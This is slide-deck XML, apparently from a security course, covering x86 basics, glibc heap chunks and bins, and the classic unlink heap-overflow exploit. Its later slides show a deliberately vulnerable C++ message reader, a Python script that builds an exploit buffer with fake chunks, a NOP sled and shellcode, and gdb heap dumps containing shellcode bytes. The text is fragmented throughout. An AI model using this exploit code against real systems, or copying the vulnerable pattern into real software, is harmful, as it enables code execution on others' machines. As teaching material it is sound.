      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49923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Codes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flags Register)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Flags register is treated as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bit vector of flags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatically set and tested by many instructions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OF – Overflow flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DF – Direction flag (loops)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SF – Sign flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ZF – Zero flag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2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Shape 6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Allocated Chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65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3727" y="2018407"/>
            <a:ext cx="7804547" cy="35580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01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Free Chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66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3727" y="2141412"/>
            <a:ext cx="7804547" cy="331201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669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Contiguous Chunks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66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2655" y="1476916"/>
            <a:ext cx="4486691" cy="46410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3562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Memory Allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Shape 6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1899" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>Free chunks are maintained in bins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543799" lvl="1" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>Double-linked list of chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543799" lvl="1" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>Bins organized by size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="271899" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>Allocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543799" lvl="1" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>Bins scanned in increasing order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543799" lvl="1" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>Return a chunk of exact size, or split a larger one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="271899" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>Deallocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543799" lvl="1" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>If chunk borders the wilderness, it is consolidated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543799" lvl="1" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>If adjacent chunks are free, they are consolidated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543799" lvl="1" indent="-271899" defTabSz="357353">
              <a:spcBef>
                <a:spcPts val="1406"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1957"/>
              <a:t>Consolidation removes old chunks and reinserts a larger merged chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51580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List Handling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Shape 6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#define unlink(P, BK, FD)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>
              <a:solidFill>
                <a:srgbClr val="C79C24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/>
              <a:t>When chunks are inserted or removed, their forward and back pointers must be updated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> for inserting chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Inlined in latest glibc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"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unlink</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> for removing chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Removes entry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P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> using its pointers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FD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> and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BK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103302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unlink</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Shape 676"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784157" y="1344057"/>
            <a:ext cx="5214116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#define unlink(P, BK, FD) {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BK = P-&gt;bk; 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FD = P-&gt;fd; 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FD-&gt;bk = BK;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BK-&gt;fd = FD;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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67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9787" y="1344057"/>
            <a:ext cx="1866615" cy="49061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8633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788" y="1328834"/>
            <a:ext cx="1872612" cy="4921947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Shape 6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unlink</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Shape 684"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784157" y="1344057"/>
            <a:ext cx="5214116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#define unlink(P, BK, FD) {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FF2600"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>BK = P-&gt;bk;             \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FF2600"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    FD = P-&gt;fd;</a:t>
            </a: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FD-&gt;bk = BK;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BK-&gt;fd = FD;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59193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788" y="1344058"/>
            <a:ext cx="1872612" cy="4946111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Shape 6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unlink</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Shape 689"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784157" y="1344057"/>
            <a:ext cx="5214116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#define unlink(P, BK, FD) {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BK = P-&gt;bk; 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FD = P-&gt;fd; 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FF2600"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FD-&gt;bk = BK;</a:t>
            </a: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BK-&gt;fd = FD;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803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788" y="1344058"/>
            <a:ext cx="1872612" cy="4946111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Shape 6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unlink</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Shape 694"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784157" y="1344057"/>
            <a:ext cx="5214116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#define unlink(P, BK, FD) {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BK = P-&gt;bk; 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FD = P-&gt;fd; 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FD-&gt;bk = BK;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FF2600"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>BK-&gt;fd = FD;</a:t>
            </a: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           \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308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unlink Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="698" name="Shape 6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BK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P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-&gt;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bk;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FD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P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-&gt;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fd;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FD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-&gt;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bk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BK;    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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*(P-&gt;fd + 24) = P-&gt;bk;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BK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-&gt;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fd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FD;    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="225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*(P-&gt;bk + 16) = P-&gt;fd;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/>
              <a:t>If the attacker can control the chunk header, he can overwrite an arbitrary memory location with an arbitrary value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>For instance, overwrite a saved IP on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Many other possibilities, as we'll see</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193686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Instruction Formats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="121" name="Table 121"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3933737292"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3083042" y="1788240"/>
          <a:ext cx="6025917" cy="401835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75234"/>
                <a:gridCol w="4150683"/>
              </a:tblGrid>
              <a:tr h="44648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300" dirty="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>Mnemonic</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill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300">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>Operands</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill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300" dirty="0" err="1">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>nop</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300" dirty="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2300">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>empty</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300" i="1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neg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eax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add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eax, 0x10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mov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eax, edx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mov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eax, byte [edx]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mov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eax, dword [edx+ecx*4]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jmp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0x08042860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4648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2300">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>jmp</a:t>
                      </a:r>
                      <a:endParaRPr sz="23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2300" dirty="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" dirty="0" err="1">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>edi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2300" dirty="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:endParaRPr sz="2300" dirty="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63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Basic Exploit Scenario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Shape 7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Vulnerable program allocates two adjacent chunks X, Y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Attacker overflows X, creates two fake free chunks W, Z over Y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When X is freed, it is merged with W and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unlink</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> is called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Since W and Z are controlled by the attacker, the attacker controls their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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> and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bk</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1968175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unlink Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Shape 706"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4928070" y="1344057"/>
            <a:ext cx="5070203" cy="4906724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="564444" indent="-564444">
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Attacker drives vulnerable program to allocate two adjacent chunks X and Y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70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6308" y="1344058"/>
            <a:ext cx="2022136" cy="49029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9888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8904" y="1344058"/>
            <a:ext cx="2059083" cy="4900616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Shape 7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unlink Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Shape 712"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4928070" y="1344057"/>
            <a:ext cx="5070203" cy="4906724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Attacker drives vulnerable program to allocate two adjacent chunks X and Y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free(X)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W is examined and Z is found using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W + W-&gt;size</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/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unlink(W, fd_W, bk_W)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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*(fd_W + 24) = bk_W</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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*(bk_W + 16) = fd_W</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4009734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Composing the Buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716" name="Shape 7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Find the address (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ADDR</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>) to overwrite with value (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VALUE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>)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First 16 bytes of chunk X overwritten by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unlink</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/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Following two bytes jump forward – e.g.,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jmp 32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Following 24 bytes modified by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unlink</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>,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frontlink</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/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Then, NOP sled and payload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Then, fake chunk with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fd = ADDR - 24</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>,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bk = VALUE</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/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Second fake chunk with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PREV_INUSE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> unset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44482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Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="720" name="Shape 7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85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RecvMsg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485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sk) {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MsgHdr hdr;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memset(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hdr,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485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(hdr));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read(sk,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hdr.len_,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read(sk,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hdr.opts_len_,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485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msg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85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reinterpret_cast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sz="1485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*&gt;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(malloc(hdr.len_));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485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msg_opts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85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reinterpret_cast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sz="1485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*&gt;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(malloc(hdr.opts_len_));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endParaRPr sz="1485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485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ptr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msg;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485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while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485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c;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485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auto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n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read(sk,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c,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485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(n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||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c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==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85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'\n'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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1485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break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++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c;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}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endParaRPr sz="1485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free(msg);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endParaRPr sz="1485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485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85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82882">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="214305" algn="l"/>
                <a:tab pos="437539" algn="l"/>
                <a:tab pos="651844" algn="l"/>
                <a:tab pos="875078" algn="l"/>
                <a:tab pos="1098313" algn="l"/>
                <a:tab pos="1312617" algn="l"/>
                <a:tab pos="1535852" algn="l"/>
                <a:tab pos="1759086" algn="l"/>
                <a:tab pos="1973391" algn="l"/>
                <a:tab pos="2196625" algn="l"/>
                <a:tab pos="2419859" algn="l"/>
                <a:tab pos="2634164" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1485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8967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724" name="Shape 7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Use gdb to find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Address of the saved IP for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RecvMsg</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/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Address of the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sz="2250"/>
              <a:t> buffer to place NOP sled and payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Structure the chunks as in the classic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unlink</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Make sure to include forward jump to bypass the clobbered section of the NOP sled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="277803" indent="-277803">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Reuse the shellcode from the stack exploit as-is</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376822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728" name="Shape 7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addr_ret_addr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0x7fffffffe7a8</a:t>
            </a:r>
            <a:endParaRPr sz="161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ret_addr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0x40c040</a:t>
            </a:r>
            <a:endParaRPr sz="161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payload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open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'payload.bin'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read()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chk_w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endParaRPr sz="161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struct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pack(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'&lt;qqqq'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65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addr_ret_addr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24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ret_addr)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'A'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32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chk_z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struct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pack( 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'&lt;qqqq'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65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'B'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32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struct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pack( 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'&lt;HH'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256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256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1617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\x90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48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1617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\xeb\x1e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endParaRPr sz="161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1617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\x90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206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len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(payload)))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payload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chk_w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chk_z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1617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sz="161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endParaRPr sz="161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sys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stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="161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1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write(buf)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1760967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Inspecting the Heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Shape 7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c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Breakpoint 2, RecvMsg(sk=0) at vuln.cpp:28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28 			 free(msg);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n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x/32xg 0x40c040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0x40c040: 0x909090909090</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1687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1eeb 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0x9090909090909090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0x40c050: 0x00007fffffffe790 0x9090909090909090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0x40c060: 0x9090909090909090 0x9090909090909090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[...]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0x40c0c0: 0x9090909090909090 0x9090909090909090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0x40c0d0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: 0x78ec834890909090 0x00002e0d88c93148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0x40c0e0: 0x000000203d8d4800 0x4c894810247c8948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0x40c0f0: 0x4808244c89481824 0x24548d481024748d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0x40c100: 0x050f3bb0c8894808 0x0168732f6e69622f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0x40c110: 0x0000000000000001 0x0000000000000041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0x40c120: 0x00007fffffffe790 0x000000000040c040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0x40c130: 0x4141414141414141 0x4141414141414141 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189714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Comments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="736" name="Shape 7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9403" indent="-309403" defTabSz="406644">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>Exploiting the heap is more difficult than the stack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Heap layout depends on runtime behavior of the program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Depending on program inputs, chunks might or might not be allocated in the required pattern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And, location of chunks might be unpredictable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="928208" lvl="2" indent="-309403" defTabSz="406644">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>(Problematic if payload is on the heap)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="309403" indent="-309403" defTabSz="406644">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2227"/>
              <a:t>Some techniques exist to mitigate these difficulties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Allocating many chunks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Heap spraying (more later)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407169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Vulnerabilities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35888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integer Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format Strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function Pointers, PLT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vtables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036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Operand Types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Literals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Integer constant directly encoded into the instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>e.g.,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mov eax, 0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> (constant 0 moved into eax)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Contents of named register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>e.g.,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mov eax, edx</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> (edx moved into eax)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Memory references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>e.g.,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mov eax, dword [edx]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1964387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More Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="750" name="Shape 7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The stack and the heap are classic exploitation targets, but by no means the only ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
